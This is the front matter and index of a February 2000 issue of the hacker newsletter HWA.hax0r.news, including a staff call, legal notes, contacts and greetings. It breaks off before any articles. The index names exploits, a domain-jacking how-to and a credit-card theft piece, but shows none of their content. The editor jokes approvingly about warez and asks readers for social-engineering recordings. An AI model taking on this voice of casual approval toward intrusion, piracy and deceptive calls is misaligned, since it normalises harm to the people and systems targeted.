Copy Link
Add to Bookmark
Report
hwa-hn50
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
==========================================================================
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #50 covering Jan 16th to Feb 13th, 2000
==========================================================================
"Taking a fat cross section of the underground and security scene today
and laying it your lap for tomorrow."
==========================================================================
__ __ _ _____ _ _ _ ___
\ \ / /_ _ _ __ | |_|_ _|__ | | | | ___| |_ __|__ \
\ \ /\ / / _` | '_ \| __| | |/ _ \| |_| |/ _ \ | '_ \ / /
\ V V / (_| | | | | |_ | | (_) | _ | __/ | |_) |_|
\_/\_/ \__,_|_| |_|\__| |_|\___/|_| |_|\___|_| .__/(_)
|_|
How Can I Help ??
~~~~~~~~~~~~~~~~~
I'm looking for staff members to help with putting the zine together
if you want your name in lights (ie: mad propz and credz in here) and
have the time to spare, then here are some of the areas I can use help
in:
The Big One:
~~~~~~~~~~~
Text to HTML project: This entails converting all existing texts to
HTML and including, were appropriate the hyperlinks for urls mentioned
in text.
Foreign Correspondants and Translators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'm also looking for people willing to translate articles from their
area (usually Dutch, German, Norwegian etc) to contribute articles
and if possible translate them into english for us. You will be
marked as HWA staff on our list, please include your email and
website info, and bio if you wish to do so, none of this is required
however. Your help is appreciated!
Site Design
~~~~~~~~~~~
I need some design ideas for the website, i've temporarily revamped it
but i'd like to test some new look and feel ideas, if you're a web
wizard and want to try your hand at making us a site, email me, and
go for it, be warned that we may NOT use your design, but don't let
that stop you from trying your hand at it. An online temp/demo site
would be helpful.
News Collection:
~~~~~~~~~~~~~~~
There are a LOT of sources and resources, many listed here and others
in the ether, search these or pick a few of these sources to search
for stories of interest and email them to me. Scan for hacked, hacking
cracked, cracking, defacement, DoS attack, Cyber cyberwar, etc as an
example.
CGI and PERL script programming
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'd like to make the zine contents searchable by keyword/issue online
and also display the indexes of online copies of the newsletter. If
you have any ideas for this let me know, I could do it myself but If
you already have a project laying around that would do for this then
why reeinvent the wheel?
Also; data grabbers that will snag the news from sites like HNN and
strip the HTML off and email the raw news data, etc, headline collectors
for security-focus and packetstorm etc are all also good ideas.
Theres more of course, if you have something you'd like to contribute
let me know and i'll find something for you to do. Thanks for listening
cruciphux@dok.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #50
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. Slash, Croatian cracker, speaks out...............................
04.0 .. The hacker sex chart 2000 ........................................
05.0 .. Peer finally arrested after over a decade of IRC terrorism........
06.0 .. Updated proxies list from IRC4ALL.................................
07.0 .. Rant: Mitnick to go wireless?.....................................
08.0 .. Distrubuted Attacks on the rise. TFN and Trinoo. .................
09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted...
10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha).........
11.0 .. Cerberus Information Security Advisory (CISADV000126).............
12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy...........
13.0 .. stream.c exploit .................................................
14.0 .. Spank, variation of the stream.c DoS..............................
15.0 .. Canadian Security Conference announcement: CanSecWest.............
16.0 .. Security Portal Review Jan 16th...................................
17.0 .. Security Portal review Jan 24th...................................
18.0 .. Security Portal review Jan 31st...................................
19.0 .. CRYPTOGRAM Jan 15th...............................................
20.0 .. POPS.C qpop vulnerability scanner by Duro.........................
21.0 .. Hackunlimited special birthday free-cdrom offer...................
22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)........................
23.0 .. PWA lead member busted by the FBI.................................
24.0 .. Mitnick's Release Statement.......................................
24.1 .. More submitted Mitnick articles...................................
25.0 .. Hackers vs Pedophiles, taking on a new approach...................
26.0 .. SCRAMDISK (Windows) on the fly encryption for your data...........
27.0 .. HNN:Jan 17: MPAA files more suits over DeCSS......................
28.0 .. WARftpd Security Alert (Will they EVER fix this software??).......
29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ............
30.0 .. HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands......
31.0 .. HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ........
32.0 .. Owning sites that run WebSpeed web db software....................
33.0 .. Cerberus Information Security Advisory (CISADV000202).............
34.0 .. Seccurity Focus Newsletter #26....................................
35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer...
36.0 .. HNN: Jan 17: NSA Wants A Secure Linux ............................
37.0 .. HNN: Jan 17: Cryptome may be breaaking the law....................
38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months ................
39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country ................
40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net ..........
41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed ................
42.0 .. HNN: Jan 21: UK to create cyber force.............................
43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack .........................
44.0 .. HNN: Jan 24: French smart card expert goes to trial...............
45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack ....
46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion ................
47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($)..............
48.0 .. HNN: Jan 24: Several New Ezine Issues Available ..................
49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft ...................
50.0 .. HNN: Jan 25: Outpost Leaks Customer Info .........................
51.0 .. HNN: Jan 25: DeCSS Author Raided .................................
52.0 .. HNN: Jan 25: Solaris May Go Free and Open ........................
53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication.
54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements ...............
55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers ...................
56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers ..........
57.0 .. HNN: Jan 26: Support for DeCSS Author Grows ......................
58.0 .. HNN: Jan 26: China To Require Crypto Registration ................
59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology ..........
60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email.................
61.0 .. HNN: Jan 27: Napster Reveals Users Info ..........................
62.0 .. Dissecting the Napster system.....................................
63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse ....................
64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law ......
65.0 .. HNN: Jan 27: Data From Probes of Takedown.com ....................
66.0 .. HNN: Jan 27: Top Ten Viruses of 1999 .............................
67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones ..............
68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack.....
69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!...
70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000 ...........
71.0 .. HNN: "Have script Will destroy" - a buffer overflow article.......
72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article....
73.0 .. HNN: The Japanese Panic Project - buffer overflow article.........
74.0 .. HNN: Jan 31 Bulgarian Indicted for Cyber Crime ..................
75.0 .. HNN: Jan 31: Online Banking Still Immature .......................
76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress ..................
77.0 .. HNN: Jan 31: USA Today Headlines Changed .........................
78.0 .. HNN: Jan 31: @Stake and L0pht ....................................
79.0 .. HNN: Jan 31: Book Review: "Database Nation".......................
80.0 .. HNN: Feb 1st: Interview with DeCSS Author ........................
81.0 .. HNN: Feb 1st: X.com Denies Security Breach .......................
82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron? ...................
83.0 .. HNN: Feb 1st; Cringely, Defcon, E-Commerce and Crypto ............
84.0 .. HNN: Feb 1st: Cold War Spies For Hire ............................
85.0 .. HNN: Feb 1st: More Ezines Available ..............................
86.0 .. HHN: Feb 2nd: WorldWide Protest Against MPAA Planned .............
87.0 .. HNN: Feb 2nd; DoubleClick Receiving Protests .....................
88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net .......................
89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire .............
90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales ................
91.0 .. HNN: Feb 2nd: Web Aps, the New Playground ........................
92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests.
93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers ......................
94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps ......................
95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info ................
96.0 .. HNN: Feb 4th: 27 Months for Piracy ...............................
97.0 .. Have you been looking for www.hack.co.za?.........................
98.0 .. HNN: Feb 4th; Security Holes Allow Prices to be Changed ..........
99.0 .. ThE,h4x0r.Br0z toss us a dis .....................................
100.0 .. HNN: Feb 4th: Carders Congregate in IRC ..........................
101.0 .. HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101 ..............
102.0 .. HNN: Feb 7th; Mitnick to Give Live Interview ....................
103.0 .. HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success ......
104.0 .. HNN: Feb 7th: Founding Member of PWA Busted ......................
105.0 .. HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of
$500 ...............................................
106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime .................
107.0 .. HNN: Feb 7th; Philippine President Web Site Defaced ..............
108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law ......
109.0 .. HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack .....
110.0 .. HNN: Feb 8th; New Hack City Video ................................
111.0 .. HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on ....
Mail Server.........................................
112.0 .. HNN: Feb 8th; Script Kiddie Training .............................
113.0 .. HNN: Feb 8th; Personal CyberWars .................................
114.0 .. HNN: Feb 8th; Space Rogue Profiled by Forbes .....................
115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's....
Next?...............................................
116.0 .. Trinoo Killer Source Code.........................................
117.0 .. Mixter's guide to defending against DDoS attacks..................
118.0 .. HNN: Feb 9th; Court Authorizes Home Computer Search .............
119.0 .. HNN: Feb 9th; MPAA Makes Deceptive Demands ......................
120.0 .. HNN: Feb 9th; Medical Sites Give Out Info .......................
121.0 .. HNN: Feb 9th; FTC Investigates Amazon Subsidiary on use of.......
Customer Info .....................................
122.0 .. HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese ..........
Defacements .......................................
123.0 .. HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder...
124.0 .. HNN; Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of......
Sites .............................................
125.0 .. HNN: Feb 10th; NIPC Releases Detection Tools ....................
126.0 .. HNN: Feb 10th; The Underground Reaction ..........................
127.0 .. HNN: Feb 10th; Haiku Worm Now on the Loose .......................
128.0 .. HNN: Feb 11th; Investigations Continue, Reports of more Possible..
Attacks Surface ...................................
129.0 .. HNN: Feb 11th;Author of Tool Used in Attacks Speaks .............
130.0 .. HNN: Feb 11th;NIPC Reissues Alert on DDoS .......................
131.0 .. HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction ..........
132.0 .. HNN: Feb 11th; Humor in the Face of Chaos .......................
133.0 .. HNN: Feb 11th; Britain Passes Despotic Laws .....................
134.0 .. HHN: Feb 11th; France Sues US and UK over Echelon ..............
135.0 .. HNN; Feb 11th; Mellissa Virus Comes Back ........................
136.0 .. HWA: aKt0r's story by wyzewun....................................
137.0 .. ISN: Jan 16:Hacker gang blackmails firms with stolen files.......
138.0 .. How to steal 2,500 credit cards..................................
139.0 .. Good IDS article from Security Portal............................
140.0 .. Win2000 security hole a 'major threat'...........................
141.0 .. New hack attack is greater threat than imagined..................
142.0 .. NSA gets bitten in the ass too...................................
143.0 .. rzsz package calls home if you don't register the software.......
144.0 .. Clinton calls Internet Summit on the DDoS threat.................
145.0 .. ISN: Who gets your trust?........................................
146.0 .. ISN: Hackers demand 10 Million pounds from Visa..................
147.0 .. ISN: Cybercrime growing harder to prosecute......................
148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin...............
149.0 .. ISN: The crime of punishment by Brian Martin.....................
150.0 .. ISN: EDI Security, Control and,Audit(Book review)by Brian Martin.
151.0 .. ISN: "Remember, some 'hackers' make house calls" ie:burglary.....
152.0 .. ISN Japanese Police crack down on hacker attacks.................
153.0 .. ISN:Behind the scenes at "Hackers Inc."..........................
154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???)..........
155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke........
156.0 .. ISN: Sites cracked with id's and passwords.......................
157.0 .. ISN: Who are these jerks anyway?.................................
158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer..........
159.0 .. SSHD Buffer overflow exploit (FreeBSD)...........................
160.0 .. Mozilla curiosity................................................
161.0 .. Any user can make hard links in Unix.............................
162.0 .. Crash windows boxes on local net (twinge.c)......................
163.0 .. SpiderMap 0.1 Released...........................................
164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow..................
165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS........................
166.0 .. .ASP error shows full source code to caller......................
167.0 .. Bypassing authentication on Axis 700 Network Scanner.............
168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS.
169.0 .. CERN 3.0A Heap overflow advisory.................................
170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit........
171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit.................
172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1..........
173.0 .. Fool firewalls into opening ports with PASV......................
174.0 .. InetServ 3.0 remote DoS exploit..................................
175.0 .. ppp 1.6.14 shows local user the saved PPP password...............
176.0 .. Another screw up in MS's Java Virtual Machine, breaks security...
177.0 .. mySQL password checking routines insecure........................
178.0 .. Guninski: Outlook and Active Scripting (again, sigh...)..........
179.0 .. Break a BeOS poorman server remotely with url infusion...........
180.0 .. Proftpd (<= pre6) linux ppc remote exploit.......................
181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open.
182.0 .. Malformed link in SERVU then a list = instant DoS (crash!).......
183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit...................
184.0 .. Yet another War-ftpd vulnerabilty (why do ppl use this?).........
185.0 .. Z0rk a Zeus Web Server DoS.......................................
186.0 .. Following up on the DDOS attacks of the past week (various)......
187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit..................
188.0 .. Bugfest! Win2000 has 63,000 'defects'............................
189.0 .. Legit Hackers Roam Cyberspace for Security.......................
190.0 .. Deutch controversy raises security questions for Internet users..
191.0 .. PC's Vulnerable to Security Breaches, Experts Say................
192.0 .. Hacking hazards come with Web scripting territory ...............
193.0 .. Microsoft battles pair of security bugs .........................
194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data....
195.0 .. How Safe Is AOL 5.0?.............................................
196.0 .. Teens steal thousands of net accounts............................
197.0 .. Online Credit Hacker May Be Out For Profit.......................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker loophole BlkOps
vetesgirl Slash bob- CHEVY*
Dragos Ruiu pr0xy
Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)
Ken Williams/tattooman ex-of PacketStorm,
&
Kevin Mitnick (free at last)
Kevin is due to be released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
kewl sites:
+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW -> ** Due to excessive network attacks
this site is now being mirrored
at http://www.siliconinc.net/hack/
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
